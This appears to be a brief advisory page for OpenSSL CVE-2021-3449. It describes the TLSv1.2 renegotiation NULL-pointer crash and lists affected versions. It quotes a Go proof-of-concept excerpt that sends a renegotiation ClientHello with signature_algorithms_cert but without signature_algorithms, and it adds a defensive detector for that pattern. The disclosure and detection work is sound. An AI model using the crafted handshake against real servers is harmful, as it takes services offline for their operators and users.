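# OpenSSL Denial-of-Service Vulnerability (CVE-2021-3449)

A NULL pointer dereference exists in OpenSSL's TLSv1.2 renegotiation option (enabled by default), and it leads to denial of service.

Affected versions: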

openssl:openssl < 1.1.1-k

PoC:

```
Usage: go run . -host hostname:port
```

```
// CVE-2021-3449 exploit code.
if hello.vers >= VersionTLS12 {
	if c.handshakes == 0 {
		println("initial handshake")
		hello.supportedSignatureAlgorithms = supportedSignatureAlgorithms
	} else {
		// OpenSSL pre-1.1.1k runs into a NULL-pointer dereference
		// if the supported_signature_algorithms extension is omitted,
		// but supported_signature_algorithms_cert is present.
		println("malicious handshake")
		hello.supportedSignatureAlgorithmsCert = supportedSignatureAlgorithms
	}
}
```
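For detection, the extension combination named in the comment above can be checked on a parsed ClientHello. The following is an added example, not code from the PoC repository or from OpenSSL: `take`, `Suspicious` and `sample` are hypothetical names, the sample messages are constructed, and the extension numbers 13 and 50 come from RFC 8446. A renegotiation ClientHello travels inside the already encrypted session, so the check assumes the handshake message is available in plaintext, for example in a TLS-terminating proxy or a test harness.

```go
package main

import "fmt"

// take splits one vector with an n-byte big-endian length prefix off b.
func take(b []byte, n int) (body, rest []byte, ok bool) {
	l := 0
	for i := 0; i < n && i < len(b); i++ {
		l = l<<8 | int(b[i])
	}
	if len(b) < n+l {
		return nil, nil, false
	}
	return b[n : n+l], b[n+l:], true
}

// Suspicious reports whether a plaintext ClientHello has signature_algorithms_cert
// (50) but no signature_algorithms (13); ok is false if msg does not parse.
func Suspicious(msg []byte) (suspicious, ok bool) {
	if len(msg) < 38 || msg[0] != 1 { // type(1), length(3), version(2), random(32)
		return false, false
	}
	b := msg[38:]
	for _, n := range []int{1, 2, 1} { // session_id, cipher_suites, compression
		_, b, _ = take(b, n) // a malformed vector leaves b nil, caught below
	}
	exts, _, ok := take(b, 2) // extensions block
	seen := map[int]bool{}
	for ok && len(exts) >= 4 {
		seen[int(exts[0])<<8|int(exts[1])] = true // extension type
		_, exts, ok = take(exts[2:], 2)           // skip extension body
	}
	ok = ok && len(exts) == 0 // leftover bytes mean a malformed block
	return ok && seen[50] && !seen[13], ok
}

// sample builds a constructed minimal ClientHello (length and version left zero).
func sample(exts ...int) []byte {
	m := append([]byte{1, 37: 0}, 0, 0, 2, 0x13, 0x01, 1, 0, 0, byte(6*len(exts)))
	for _, e := range exts {
		m = append(m, byte(e>>8), byte(e), 0, 2, 4, 3) // type, len=2, 2-byte body
	}
	return m
}

func main() {
	fmt.Println(Suspicious(sample(13, 50))) // both extensions present
	fmt.Println(Suspicious(sample(50)))     // only signature_algorithms_cert
}
```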

ref:

* https://github.com/terorie/cve-2021-3449
* https://www.openssl.org/news/secadv/20210325.txt
